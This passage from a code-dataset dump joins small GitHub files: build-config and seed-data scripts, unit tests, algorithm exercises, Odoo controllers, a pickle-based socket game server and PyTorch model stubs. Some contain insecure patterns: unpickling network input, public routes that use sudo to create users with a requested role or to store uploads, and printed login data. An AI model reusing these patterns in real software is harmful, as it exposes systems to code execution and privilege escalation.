Geometry(resolution=resolution)\n\n","repo_name":"stvno/bigmetadata","sub_path":"tasks/es/cnig.py","file_name":"cnig.py","file_ext":"py","file_size_in_byte":5235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"38128210947","text":"import os\nimport sys\nimport argparse\nimport codecs\n\n# add ninja/misc to the import path \nsys.path.append(os.path.join(os.path.dirname(__file__),'..','ninja','misc'))\nfrom ninja_syntax import Writer\n\nif __name__=='__main__':\n # parse command-line arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('output')\n args = parser.parse_args()\n\n with codecs.open(args.output, 'w', 'utf-8') as f:\n writer = Writer(f)\n\n writer.comment('File that defines constants etc. for ninja')\n writer.newline()\n\n # the root directory of this repository\n root_dir = os.path.abspath(os.path.join(os.path.dirname(__file__),'..'))\n \n writer.comment('Text converter')\n writer.variable(key='text_converter',value=os.path.join(root_dir, 'scripts', 'text_converter.py'))\n\n writer.comment('Text merger')\n writer.variable(key='text_merger',value=os.path.join(root_dir, 'scripts', 'text_merger.py'))\n \n writer.comment('Intermediate directory')\n writer.variable(key='tmpdir',value=os.path.join(root_dir, 'build', 'tmp'))\n \n writer.comment('Output directory')\n writer.variable(key='outdir',value=os.path.join(root_dir, 'build', 'out'))\n \n writer.comment('Settings file')\n writer.variable(key='setting_file',value=os.path.join(root_dir, 'data', 'setting.json'))\n ","repo_name":"towazumi/ninja_res_bld_sample","sub_path":"scripts/ninja_config_writer.py","file_name":"ninja_config_writer.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32094430831","text":"from datetime import datetime, timedelta\nfrom random import randint\nfrom models.models import Category, Product, Sale, Inventory, InventoryChangeLog\nfrom db.database import SessionLocal\n\nDATABASE_URL = \"sqlite:///_ecommerce.db\"\n\ndb = SessionLocal()\n\n\ncategories_data = [\n {\"name\": \"electronics\"},\n {\"name\": \"furniture\"},\n {\"name\": \"cars\"},\n {\"name\": \"kitchen\"},\n # Add more category data if needed\n]\n\n# Sample data for products\nproducts_data = [\n {\n \"name\": \"Iphone\",\n \"description\": \"A premium quality mobile phone\",\n \"price\": 200000.99,\n \"category_id\": 1,\n },\n {\n \"name\": \"Bed\",\n \"description\": \"Gives uninterrupted sleep\",\n \"price\": 15000.00,\n \"category_id\": 2,\n },\n {\n \"name\": \"Refrigerator\",\n \"description\": \"A high quality cooling machine\",\n \"price\": 20999.99,\n \"category_id\": 1,\n },\n {\n \"name\": \"Audi A6\",\n \"description\": \"A world class car\",\n \"price\": 250000.00,\n \"category_id\": 3,\n },\n {\n \"name\": \"Sofa Set\",\n \"description\": \"A world class sofa set\",\n \"price\": 10000.00,\n \"category_id\": 2,\n },\n {\n \"name\": \"Oven\",\n \"description\": \"A high quality oven\",\n \"price\": 22222.00,\n \"category_id\": 4,\n },\n # Add more product data if needed\n]\n\ndb.bulk_save_objects([Category(**data) for data in categories_data])\ndb.commit()\n\ndb.bulk_save_objects([Product(**data) for data in products_data])\ndb.commit()\n\nsales_data = []\n\nstart_date = datetime(2021, 8, 1)\nend_date = datetime(2022, 11, 30)\n\nwhile start_date <= end_date:\n for product in db.query(Product).all():\n quantity_sold = randint(1, 10)\n\n hours = randint(0, 23)\n minutes = randint(0, 59)\n\n sale_timestamp = datetime(\n start_date.year, start_date.month, start_date.day, hours, minutes\n 
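# attach the random wall-clock time drawn above to the current date cursor\n 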
)\n\n sale = Sale(\n product_id=product.id,\n sale_timestamp=sale_timestamp,\n quantity_sold=quantity_sold,\n )\n sales_data.append(sale)\n start_date += timedelta(days=1)\n\ninventory_data = []\n\nfor product in db.query(Product).all():\n initial_stock = randint(20, 100)\n low_stock_alert_threshold = 10\n inventory = Inventory(\n product_id=product.id,\n current_stock=initial_stock,\n low_stock_alert_threshold=low_stock_alert_threshold,\n )\n inventory_data.append(inventory)\n\n\ninventory_change_logs_data = []\nstart_date = datetime(2021, 8, 1)\n\nfor product in db.query(Product).all():\n for _ in range(5):\n quantity_change = randint(0, 50)\n new_quantity = (\n product.inventory[0].current_stock + quantity_change\n if product.inventory\n else quantity_change\n )\n # day capped at 28 keeps February valid; draw a fresh random time per log\n timestamp = datetime(2022, randint(1, 12), randint(1, 28), randint(0, 23), randint(0, 59))\n\n change_log = InventoryChangeLog(\n product_id=product.id,\n quantity_change=quantity_change,\n new_quantity=new_quantity,\n timestamp=timestamp,\n )\n inventory_change_logs_data.append(change_log)\n\n\ndef populate_database():\n try:\n db.bulk_save_objects(sales_data)\n\n db.bulk_save_objects(inventory_data)\n\n db.bulk_save_objects(inventory_change_logs_data)\n\n db.commit()\n print(\"Sample data has been inserted into the database.\")\n except Exception as e:\n db.rollback()\n print(\"Error:\", str(e))\n finally:\n db.close()\n\n\nif __name__ == \"__main__\":\n populate_database()\n","repo_name":"Adan-Asim/E-commerce-Admin-App-Backend","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8770605510","text":"#!/usr/bin/python3\n\"\"\"Unittest for rectangle.py\n\"\"\"\nimport unittest\nimport io\nimport sys\nfrom models.base import Base\nfrom models.rectangle import Rectangle\n\n\nclass TestRectangle(unittest.TestCase):\n \"\"\"Testing class for Rectangle\n \"\"\"\n def setUp(self):\n \"\"\"Setup actions\n \"\"\"\n Base._Base__nb_objects = 0\n\n def test_id(self):\n \"\"\"Testing id setting\n \"\"\"\n r1 = Rectangle(10, 2)\n self.assertEqual(r1.id, 1)\n r2 = Rectangle(2, 10)\n self.assertEqual(r2.id, 2)\n r3 = Rectangle(10, 2, 0, 0, 12)\n self.assertEqual(r3.id, 12)\n r4 = Rectangle(1, 1, 1, 1, \"Bella\")\n self.assertEqual(r4.id, \"Bella\")\n\n def test_values(self):\n \"\"\"Testing input validation\n \"\"\"\n r4 = Rectangle(10, 2)\n with self.assertRaises(TypeError):\n r4.x = {}\n with self.assertRaises(TypeError):\n r4.y = True\n with self.assertRaises(TypeError):\n r4.height = True\n with self.assertRaises(TypeError):\n r4.x = True\n with self.assertRaises(TypeError):\n r4.width = True\n with self.assertRaises(TypeError):\n r5 = Rectangle(\"2\", 10)\n r6 = Rectangle(10, 2)\n with self.assertRaises(ValueError):\n r6.width = -10\n with self.assertRaises(ValueError):\n r6.height = -10\n with self.assertRaises(ValueError):\n r6.y = -3\n with self.assertRaises(ValueError):\n r6.x = -3\n with self.assertRaises(ValueError):\n r6.width = 0\n with self.assertRaises(ValueError):\n r6.height = 0\n with self.assertRaises(TypeError):\n r7 = Rectangle()\n with self.assertRaises(TypeError):\n r8 = Rectangle(3.14159, 1)\n with self.assertRaises(TypeError):\n r9 = Rectangle(3, 1.41421)\n with self.assertRaises(TypeError):\n r10 = Rectangle(3, 1, 3.14159, 1)\n with self.assertRaises(TypeError):\n r11 = Rectangle(3, 1, 3, 1.41421)\n\n def test_area(self):\n \"\"\"Testing area\n \"\"\"\n r8 = Rectangle(3, 2)\n 
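# area() should return width * height\n 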
self.assertEqual(r8.area(), 6)\n r9 = Rectangle(8, 7, 0, 0, 12)\n self.assertEqual(r9.area(), 56)\n\n\n def test_display(self):\n \"\"\"Testing display\n \"\"\"\n r1 = Rectangle(4, 6)\n capturedOutput1 = io.StringIO()\n sys.stdout = capturedOutput1\n r1.display()\n self.assertEqual(capturedOutput1.getvalue(),\n \"####\\n####\\n####\\n####\\n####\\n####\\n\")\n r2 = Rectangle(2, 3, 2, 2)\n capturedOutput2 = io.StringIO()\n sys.stdout = capturedOutput2\n r2.display()\n self.assertEqual(capturedOutput2.getvalue(),\n \"\\n\\n ##\\n ##\\n ##\\n\")\n r3 = Rectangle(2, 3, 0, 2)\n capturedOutput3 = io.StringIO()\n sys.stdout = capturedOutput3\n r3.display()\n self.assertEqual(capturedOutput3.getvalue(),\n \"\\n\\n##\\n##\\n##\\n\")\n r4 = Rectangle(2, 3, 2, 0)\n capturedOutput4 = io.StringIO()\n sys.stdout = capturedOutput4\n r4.display()\n self.assertEqual(capturedOutput4.getvalue(),\n \" ##\\n ##\\n ##\\n\")\n sys.stdout = sys.__stdout__\n\n def test_print(self):\n \"\"\"Testing print\n \"\"\"\n r1 = Rectangle(4, 6, 2, 1, 12)\n capturedOutput1 = io.StringIO()\n sys.stdout = capturedOutput1\n print(r1)\n self.assertEqual(capturedOutput1.getvalue(),\n \"[Rectangle] (12) 2/1 - 4/6\\n\")\n r2 = Rectangle(5, 5, 1)\n capturedOutput2 = io.StringIO()\n sys.stdout = capturedOutput2\n print(r2)\n self.assertEqual(capturedOutput2.getvalue(),\n \"[Rectangle] (1) 1/0 - 5/5\\n\")\n sys.stdout = sys.__stdout__\n\n def test_update(self):\n \"\"\"Testing update\n \"\"\"\n r1 = Rectangle(10, 10, 10, 10)\n capturedOutput1 = io.StringIO()\n sys.stdout = capturedOutput1\n print(r1)\n self.assertEqual(capturedOutput1.getvalue(),\n \"[Rectangle] (1) 10/10 - 10/10\\n\")\n r1.update(89, 2, 3, 4, 5)\n capturedOutput2 = io.StringIO()\n sys.stdout = capturedOutput2\n print(r1)\n self.assertEqual(capturedOutput2.getvalue(),\n \"[Rectangle] (89) 4/5 - 2/3\\n\")\n r1.update()\n capturedOutput3 = io.StringIO()\n sys.stdout = capturedOutput3\n print(r1)\n self.assertEqual(capturedOutput3.getvalue(),\n \"[Rectangle] (89) 4/5 - 2/3\\n\")\n r1.update(y=1, width=4, x=3, id=88)\n capturedOutput4 = io.StringIO()\n sys.stdout = capturedOutput4\n print(r1)\n self.assertEqual(capturedOutput4.getvalue(),\n \"[Rectangle] (88) 3/1 - 4/3\\n\")\n r1.update(x=1, height=4, y=3, width=2)\n capturedOutput5 = io.StringIO()\n sys.stdout = capturedOutput5\n print(r1)\n self.assertEqual(capturedOutput5.getvalue(),\n \"[Rectangle] (88) 1/3 - 2/4\\n\")\n sys.stdout = sys.__stdout__\n\n def test_dict(self):\n \"\"\"Testing to_dict\n \"\"\"\n r1 = Rectangle(10, 2, 1, 9)\n self.assertEqual(r1.to_dictionary(), {'x': 1, 'y': 9, 'id': 1,\n 'height': 2, 'width': 10})\n self.assertEqual(type(r1.to_dictionary()), dict)\n r2 = Rectangle(1, 1)\n r2.update(**r1.to_dictionary())\n self.assertEqual(r2.to_dictionary(), {'x': 1, 'y': 9, 'id': 1,\n 'height': 2, 'width': 10})\n self.assertNotEqual(r1, r2)\n\n def test_json(self):\n \"\"\"Testing json\n \"\"\"\n r1 = Rectangle(10, 7, 2, 8)\n self.assertEqual(r1.to_dictionary(), {'x': 2, 'width': 10, 'id': 1,\n 'height': 7, 'y': 8})\n json = Base.to_json_string([r1.to_dictionary()])\n self.assertEqual(type(json), str)\n r2 = Rectangle(2, 4)\n Rectangle.save_to_file([r1, r2])\n capturedOutput = io.StringIO()\n sys.stdout = capturedOutput\n with open(\"Rectangle.json\", \"r\") as file:\n self.assertEqual(type(file.read()), str)\n list_rectangles_input = [r1, r2]\n Rectangle.save_to_file(list_rectangles_input)\n list_rectangles_output = Rectangle.load_from_file()\n capturedOutput2 = io.StringIO()\n sys.stdout = 
capturedOutput2\n for rect in list_rectangles_input:\n print(rect)\n for rect in list_rectangles_output:\n print(rect)\n self.assertEqual(capturedOutput2.getvalue(),\n \"[Rectangle] (1) 2/8 - 10/7\\n\"\n \"[Rectangle] (2) 0/0 - 2/4\\n\"\n \"[Rectangle] (1) 2/8 - 10/7\\n\"\n \"[Rectangle] (2) 0/0 - 2/4\\n\")\n self.assertNotEqual(id(list_rectangles_input[0]),\n id(list_rectangles_output[0]))\n self.assertNotEqual(id(list_rectangles_input[1]),\n id(list_rectangles_output[1]))\n sys.stdout = sys.__stdout__\n\n def test_csv(self):\n \"\"\"Testing csv\n \"\"\"\n r1 = Rectangle(10, 7, 2, 8)\n r2 = Rectangle(2, 4)\n list_rectangles_input = [r1, r2]\n Rectangle.save_to_file_csv(list_rectangles_input)\n list_rectangles_output = Rectangle.load_from_file_csv()\n capturedOutput = io.StringIO()\n sys.stdout = capturedOutput\n for rect in list_rectangles_input:\n print(rect)\n for rect in list_rectangles_output:\n print(rect)\n self.assertEqual(capturedOutput.getvalue(),\n \"[Rectangle] (1) 2/8 - 10/7\\n\"\n \"[Rectangle] (2) 0/0 - 2/4\\n\"\n \"[Rectangle] (1) 2/8 - 10/7\\n\"\n \"[Rectangle] (2) 0/0 - 2/4\\n\")\n sys.stdout = sys.__stdout__\n self.assertNotEqual(id(list_rectangles_input[0]),\n id(list_rectangles_output[0]))\n self.assertNotEqual(id(list_rectangles_input[1]),\n id(list_rectangles_output[1]))\n","repo_name":"c-eng/holbertonschool-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/tests/test_models/test_rectangle.py","file_name":"test_rectangle.py","file_ext":"py","file_size_in_byte":8335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10375096455","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nm, n = map(int, input().split())\r\nboard = [['' for _ in range(n)] for _ in range(m)]\r\nfor i in range(m):\r\n s = input().strip()\r\n for j in range(n):\r\n board[i][j] = s[j]\r\n\r\nnext_color = {'W': 'B', 'B': 'W'}\r\n\r\n\r\ndef make_chess(y, x, color):\r\n painting = 0\r\n for ny in range(y, y+8):\r\n for nx in range(x, x+8):\r\n if board[ny][nx] != color:\r\n painting += 1\r\n color = next_color[color]\r\n color = next_color[color]\r\n return painting\r\n\r\n\r\nanswer = float('inf')\r\nfor i in range(m):\r\n for j in range(n):\r\n if i+8 <= m and j+8 <= n:\r\n cnt = min(make_chess(i, j, 'B'), make_chess(i, j, 'W'))\r\n answer = min(answer, cnt)\r\nprint(answer)\r\n","repo_name":"yejin7211/Algorithm","sub_path":"백준/Silver/1018. 
체스판 다시 칠하기/체스판 다시 칠하기.py","file_name":"체스판 다시 칠하기.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"24437899802","text":"#Find The Missing Number\ndef MissingNumber(arr):\n    CyclicSort(arr) \n    for i in range(len(arr)):\n        if( arr[i] != i):\n            return i\n    return len(arr)\n\n#Numbers Disappeared in an array\ndef DissappearedNumbers(arr):\n    CyclicSort(arr)\n    ans = []\n    for i in range(len(arr)):\n        if(arr[i] != i):\n            ans.append(i)\n    return ans\n\ndef CyclicSort(arr):\n    i = 0\n    while i < len(arr):\n        # use correct = arr[i]-1 if the array starts from 1 instead of 0\n        correct = arr[i] \n        if arr[i] < len(arr) and not arr[i] == arr[correct]:\n            swap(arr, i, correct)\n        else:\n            i += 1\n    return arr\n\ndef swap(arr,first,last):\n    temp = arr[first]\n    arr[first]=arr[last]\n    arr[last]=temp\n\n\narr = [4, 3, 2, 7, 8, 2, 3, 1]\nprint(CyclicSort(arr))\nprint(MissingNumber(arr))\nprint(DissappearedNumbers(arr))","repo_name":"Aym-n/DSA_Bootcamp_Python","sub_path":"Sorting/CycleSort.py","file_name":"CycleSort.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"22305969976","text":"from odoo import http\nfrom odoo.http import request\nfrom odoo.addons.auth_signup.controllers.main import AuthSignupHome\nimport base64\nimport xmlrpc.client\n\nfrom odoo.addons.auth_oauth.controllers.main import OAuthLogin\n\n\nclass Teacherdata(http.Controller):\n    \n    @http.route('/teacher_webform', type='http' , auth=\"public\" , website='True')\n    def school_form(self,**kw):\n        \n        \n        # pr = request.env['res.users'].search([])\n        \n        # print(pr,'==-=-=-==-==-=-==-=-=--==-=-==')\n        # for i in pr:\n        #     print(i.login)\n        pr = request.session.uid\n        print(type(pr))\n        data = request.env['res.users'].browse(pr)\n        print(type(data))\n        for i in data:\n            t = request.session['op'] = i.role\n        print(t)    \n        \n        if \"Hr\" == t:\n            return http.request.render('school.create_teacher')\n        \n        return \"this page is not accessible to you\"  \n    \n    \n    \n    \n    \n    @http.route('/teacher', type='http' , auth=\"user\" , website='True')    \n    def teacher(self, **kw):\n        # print(\"data has been created.....\", kw)\n        \n        file = request.httprequest.files.get(\"file\").read()\n        \n        file = base64.b64encode(file)\n        \n        print(file)\n        name = kw['name']\n        email = kw['email']\n        gender = kw['gender']\n        phone = kw['phone']\n        \n        \n        abc = request.env['school.profile'].create({'name':name, 'email':email ,\n                                                    'gender':gender, 'phone':phone})\n        print(abc,\"======================================\")\n        return \"data created\"\n    \n    \n    @http.route('/demo', type='http' , auth=\"public\" , website='True')\n    def public_page(self,**kw):\n\n        return http.request.render('school.public_page')\n    \n    \n    @http.route('/lols', type='http' , auth=\"public\" , website='True')\n    def detail_page(self,**kw):  # renamed: a second method named public_page would shadow the /demo handler\n\n        return http.request.render('school.detail')\n    \n    \n    \n    @http.route('/att', type='http' , auth=\"public\" , website='True')\n    def attt(self,**kw):\n        return http.request.render('school.send_attechments')\n\n\n    @http.route('/project/uploaded', type='http', auth=\"public\", website=True)\n    def upload_files(self, **post):\n        values = {}\n        if post.get('attachment',False):\n            Attachments = request.env['ir.attachment']\n            name = post.get('attachment').filename  \n            file = post.get('attachment')\n            project_id = post.get('project_id')\n            attachment = file.read()   \n            attachment_id = Attachments.sudo().create({\n                'name':name,\n                'datas_fname': name,\n                'res_name': 
name,\n                'type': 'binary',   \n                'res_model': 'attachment.files',\n                'res_id': project_id,\n                'datas': base64.b64encode(attachment),  # .encode('base64') is Python 2 only; use the base64 module\n            })\n            value = {\n                'attachment' : attachment_id\n            }\n            print(value)\n        return request.render(\"modulename.template_to_render\", value)\n        \n        # return \"data created\"\n    \n    \n    \n    \n    \n    \n#=======----------=--=\\--\\--=-\\--- Inherit controller and url =-\\-=\\---------=======================================    \n\n    \n    \nclass Inherit_teacher_class(Teacherdata):\n\n    # Inherit existing url \n    \n    @http.route('/shop', type='http' , auth=\"user\" , website='True')\n    def shop_data(self,**kw):\n        # res = super(Inherit_teacher_class, self).shop_data(page=0,**kw) # if need then use super both functionality work existing and new \n        print(\"this is new url for shop --------------\")\n        # return res\n        return http.request.render('school.shops')\n    \n    \n    \n    # inherit controller  \n    \n    @http.route('/teacher_webform', type='http' , auth=\"public\" , website='True')\n    def school_form(self,**kw):\n        res = super(Inherit_teacher_class, self).school_form(page=0,**kw) # if need then use super both functionality work existing and new \n        print(\"=======----------=--=\\\\--\\\\--=-\\\\---=-\\\\-=\\\\-------- from Inherit_teacher_class\")\n        print('-==-----=-=-=-=', res.qcontext, '=================================================' )\n        return res\n    \n\n    @http.route('/schooldata', type='http' , auth=\"public\" , website='True')\n    def school_data(self,**kw):\n        print('fjdskfjjsdflsjd')\n        op = request.env['school.profile'].search([])\n        print(op)\n        \n        return http.request.render(\"school.sdata\", {'op':op})\n    \n    \n    \nclass signupcustom(AuthSignupHome):\n    \n    \n    @http.route('/loginform', type='http', auth='public', website=True, sitemap=False)\n    def loginform(self, *args, **kw):\n        \n        return http.request.render('school.login')\n    \n    \n    \n    @http.route('/logins', type='http', auth='public', website=True, sitemap=False)\n    def logincheck(self, *args, **kw):\n        url = 'http://0.0.0.0:8069'\n        db = 'backup_odoo_15_login'  \n        login = kw['login']  \n        password = kw['password']  \n        \n        print(login,'lolollllll-=-=-==--=-=-=--=-=-=--=')\n        \n        common = xmlrpc.client.ServerProxy('{}/xmlrpc/2/common'.format(url))\n        print(common, 'common in odoo -=----=------=-=-=')\n        uid = common.authenticate(db,login, password, {})\n        \n        if uid:\n            print(\"this authentication was successful\")\n            return http.request.render('school.shops')\n            # return uid, url, db, common, password\n\n        \n        else:\n            print(\"auth failed\")\n        \n        # o = super(OAuthLogin, self).web_login(*args, **kw)    \n        return \"dsflsdklk\"\n    \n    \n    \n    \n    \n    @http.route('/web/signup', type='http', auth='public', website=True, sitemap=False)\n    def testdata(self, *args, **kw):\n        \n        return http.request.render('school.abcd')\n    \n    \n    \n    @http.route('/test', type='http', auth='public', website=True, sitemap=False)\n    def web_auth_signup(self, *args, **kw):\n        print()\n        print(\"this sc lalla =====0=0\")\n        print()\n        role = kw['role']\n        login = kw['login']\n        password = kw['password']\n        name = kw['name']\n        \n        \n        pr = request.env['res.users'].search([])\n        \n        print(pr,'==-=-=-==-==-=-==-=-=--==-=-==')\n        # for i in pr:\n        #     o = i.login\n        #     print(o,'in the function=\\\\=\\\\==\\\\==\\\\=\\\\==\\\\=\\\\\\\\=s')\n        #     return \"enter other username\"\n           \n        request.env['res.users'].sudo().create({'role':role, 'login':login , 'password':password,'name':name})\n        \n        print('=\\\\\\\\\\\\=====================================')\n        \n        p = request.session['names'] = role\n        \n        print( p, \"this is from inheriting ...... 
sign up form\")\n \n \n # response = super(signupcustom, self).web_auth_signup(*args, **kw)\n \n return 'data is created'\n \n\n \n \n # @http.route('/web/login', type='http', auth='public', website=True, sitemap=False)\n # def web_login(self, *args, **kw):\n # print()\n # print()\n # print()\n \n # print(request.params['login'], request.params['password']) \n \n # request.session['names'] = 'saas'\n # print(kw, 'kw===============================')\n # pr = request.session.uid\n \n # print(pr,'prprprprprpprprprooppopo-=-=====-=-=---')\n # data = request.env['res.users'].browse(pr)\n # print(data, '===---=-====-==-=-=--=--=-0=0-=0=0=-0=0=0=0=00 ')\n # for i in data:\n # o = i.role\n # p = request.session['roles'] = kw\n # print(p, \"this is -=-=-==-==-=-=-=-=--=-===--=-=----==-\")\n # data = super(signupcustom, self).web_login(*args, **kw)\n \n # return data\n \n @http.route('/web/login', type='http', auth='public', website=True, sitemap=False)\n def web_login(self, *args, **kw):\n print(kw , \"this is from inherit web logins\")\n print(kw, '-------------------')\n data = super(signupcustom, self).web_login(*args, **kw)\n # a = request.env['res.users'].search([])\n # for i in a:\n # print(i.role)\n # print(a)\n # print(\"-=-=-=\")\n # if request.session.uid:\n # pr = request.session.uid\n \n # dataa = request.env['res.users'].browse(pr)\n # for i in dataa:\n # print(i)\n \n # print(dataa)\n \n print(data , '----------------------------------')\n return data\n\n\n \n\n # @http.route('/web/signup', type='http', auth='public', website=True, sitemap=False)\n # def web_auth_signup(self , *args,**kw):\n # res = super(signupcustom , self).web_auth_signup(*args, **kw)\n # op = request.session['names'] = lambda self: self.env.user\n # print(op,'oopopoppopopopopopop90909009909090----==-=-=∂')\n # return res\n \n\n \n # @http.route('/test', type='http', auth='public', website=True, sitemap=False)\n # def web_auth_signup(self, *args, **kw):\n \n # abc = request.env['res.users'].create(kw)\n # print(abc.role, '-=-=-=-=-=-==-==-888888888888888888888888888')\n # res = super(signupcustom , self).web_auth_signup(*args, **kw)\n # print(abc, 'this is add field in sign up form n -=-===-==-=-=-=--=-=-=-==--=-==--=--=-=-=-=-==-=----====-=') \n # # response = super(signupcustom, self).web_auth_custom(**kw)\n # print( 'call from inherit users ontrolers -=-==-=-=--=-=-=-=--= -=- -=- users ===--=-=-==--=---')\n # res = request.render('auth_signup.signup')\n # return res\n \n \n # custom make signup\n \n \n \nclass Fileattechments(http.Controller):\n \n @http.route('/abc', type='http', auth='public', website=True, sitemap=False)\n def abc(self, *args, **kw):\n return http.request.render('school.attechments')\n\n @http.route('/attach', type='http', auth='public', website=True, sitemap=False)\n def attechments_file(self, *args, **kw):\n # data = request.env['attachment.files'].create(kw)\n \n files = request.httprequest.files.get(\"attachment\").read()\n print(files, '-=-=-=-=--=-=0-=-=-=-==')\n resume = base64.b64encode(files)\n print(resume, '-=-=-=-=-=-=-=-==\\=\\=\\====')\n bytes = resume.decode('utf8')\n print(bytes, '-=-=-=-==---=-\\-=\\-\\---=--=')\n # print(files, 'ioioioioioioioopoppopop8909009090909090-=789789-=')\n # resume = io.BytesIO(base64.b64decode(files))\n \n \n \n op = request.env['attachment.files'].create({'attachment':bytes})\n print(op,'------=-==-=-=-=-=-=-=-==--=-=-=')\n return \"data is create ed\" \n\n\n @http.route('/attach_view', type='http', auth='public', website=True, sitemap=False)\n 
def aaa(self, *args, **kw):\n \n op = request.env['attachment.files'].search([])\n \n return http.request.render('school.datass' , {'op':op})","repo_name":"gautamsinh007/odoo_login_demo","sub_path":"addons/school/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3078366370","text":"from matplotlib import pyplot as plt\n\nx = [1, 2, 3, 4, 5]\ny = [1, 4, 9, 16, 25]\n\nimport numpy as np\na = np.array(x)\nb = np.array(y)\nplt.plot(a, b)\n\nimport cv2\ngray_img = cv2.imread('images/sandstone.tif', 0)\n\nplt.imshow(gray_img, cmap=\"gray\")\nplt.show()\n\nplt.hist(gray_img.flat, bins=100, range=(0,255)) # gray_img.flat flattens a 2D array to 1D\nplt.show()","repo_name":"juanvalen15/imageProcessingPython","sub_path":"p003-plotting.py","file_name":"p003-plotting.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73643583093","text":"import socket\nfrom _thread import *\nimport pickle\nfrom game import Game\nimport sys\n\nPORT = 5555\nSERVER = socket.gethostbyname(socket.gethostname())\n\n# SERVER = \"\"\nADDR = (SERVER, PORT)\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ntry:\n server.bind(ADDR)\nexcept socket.error as e:\n str(e)\n\nserver.listen(2)\nprint(\"SERVER UP: Waiting for Connections..\")\n\n# this will carry the game instances\ngames = {}\nidCount = 0\n\n\ndef threaded_client(conn, p, gameId):\n global idCount\n\n # When a connection is made initially, send back player object\n # Before sending -> encode and serialize data\n # check if p is 0 or 1, odd or even. this will determine what player to send back\n # this sends back player position\n if p % 2 == 0:\n conn.send(pickle.dumps(games[gameId].player1))\n else:\n conn.send(pickle.dumps(games[gameId].player2))\n\n reply = \"\"\n while True:\n try:\n # this should be the current players position\n data = pickle.loads(conn.recv(2048))\n\n if not data:\n print(\"Disconnected, Server didnt receive data\")\n break\n # put this into the games object, players position\n # check which player\n if p % 2 == 0:\n games[gameId].player1 = data\n else:\n games[gameId].player2 = data\n\n if p % 2 == 0:\n reply = games[gameId].player2\n else:\n reply = games[gameId].player1\n\n conn.sendall(pickle.dumps(reply))\n except:\n break\n\n print(\"Lost connection\")\n try:\n del games[gameId]\n print(\"Closing Game\", gameId)\n except:\n pass\n idCount -= 1\n conn.close()\n\n\nwhile True:\n conn, addr = server.accept()\n print(\"Connected to:\", addr)\n\n idCount += 1\n p = 0\n gameId = (idCount - 1) // 2\n if idCount % 2 == 1:\n games[gameId] = Game(gameId)\n print(\"Creating a new game...\")\n else:\n games[gameId].ready = True\n p = 1\n\n start_new_thread(threaded_client, (conn, p, gameId))\n","repo_name":"daveeS987/v2socket","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23068213759","text":"from collections import defaultdict\nimport os\nimport sys\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport h5py \nimport numpy as np \nfrom transformers import BertPreTrainedModel\nfrom .vilmodel import BertXAttention\nfrom .vilmodel import BertLayerNorm, BertOnlyMLMHead, GlocalTextPathCMT\nfrom .ops import pad_tensors_wgrad, 
gen_seq_masks\n\nROOM2IND = {'balcony' : 23, 'bathroom': 0, 'classroom': 26, 'dining_booth': 27, 'entryway': 4, 'garage': 6, \n            'junk': 29, 'laundryroom': 9, 'living room': 11, 'meetingroom': 12, 'other_room': 24, 'porch': 15,\n            'spa': 28, 'toilet': 18, 'utilityroom': 19, 'bar': 25, 'bedroom': 1, 'closet': 2,\n            'dining_room': 3, 'familyroom': 5, 'hallway': 7, 'kitchen': 10, 'library': 8, 'lounge': 13,\n            'office': 14, 'outdoor': 22,'rec': 16, 'stairs': 17, 'tv': 20, 'workout': 21,\n}\n\nIND2ROOM={ 23: 'balcony', 0: 'bathroom', 26: 'classroom', 27: 'dining_booth',4: 'entryway', 6: 'garage',\n    29: 'junk', 9: 'laundryroom', 11: 'living room', 12: 'meetingroom',24:'other_room', 15: 'porch',\n    28: 'spa', 18: 'toilet', 19 :'utilityroom', 25:'bar', 1:'bedroom', 2: 'closet',\n    3: 'dining_room', 5: 'familyroom', 7 :'hallway', 10: 'kitchen', 8:'library', 13: 'lounge',\n    14: 'office', 22: 'outdoor', 16: 'rec', 17: 'stairs', 20:'tv', 21: 'workout'  # was 12: 'outdoor', which collided with 'meetingroom' and dropped index 22\n}\n\nclass RegionClassification(nn.Module):\n    \" for MRC(-kl)\"\n    def __init__(self, hidden_size, label_dim):\n        super().__init__()\n        self.net = nn.Sequential(nn.Linear(hidden_size, hidden_size),\n                                 nn.ReLU(),\n                                 BertLayerNorm(hidden_size, eps=1e-12),\n                                 nn.Linear(hidden_size, label_dim))\n\n    def forward(self, input_):\n        output = self.net(input_)\n        return output\n\n\nclass ClsPrediction(nn.Module):\n    def __init__(self, hidden_size, input_size=None):\n        super().__init__()\n        if input_size is None:\n            input_size = hidden_size\n        self.net = nn.Sequential(nn.Linear(input_size, hidden_size),\n                                 nn.ReLU(),\n                                 BertLayerNorm(hidden_size, eps=1e-12),\n                                 nn.Linear(hidden_size, 1))\n\n    def forward(self, x):\n        return self.net(x)\n\nclass RoomPrediction(nn.Module):\n    def __init__(self, output_size, input_size, hidden_size=None):\n        super().__init__()\n        if hidden_size is None:\n            hidden_size = input_size \n        self.net = nn.Sequential(nn.Linear(input_size, hidden_size),\n                                 nn.ReLU(),\n                                 nn.Linear(hidden_size, output_size))\n    \n    def forward(self, x):\n        return self.net(x)\n\n\nclass RoomPredictionImg(nn.Module):\n    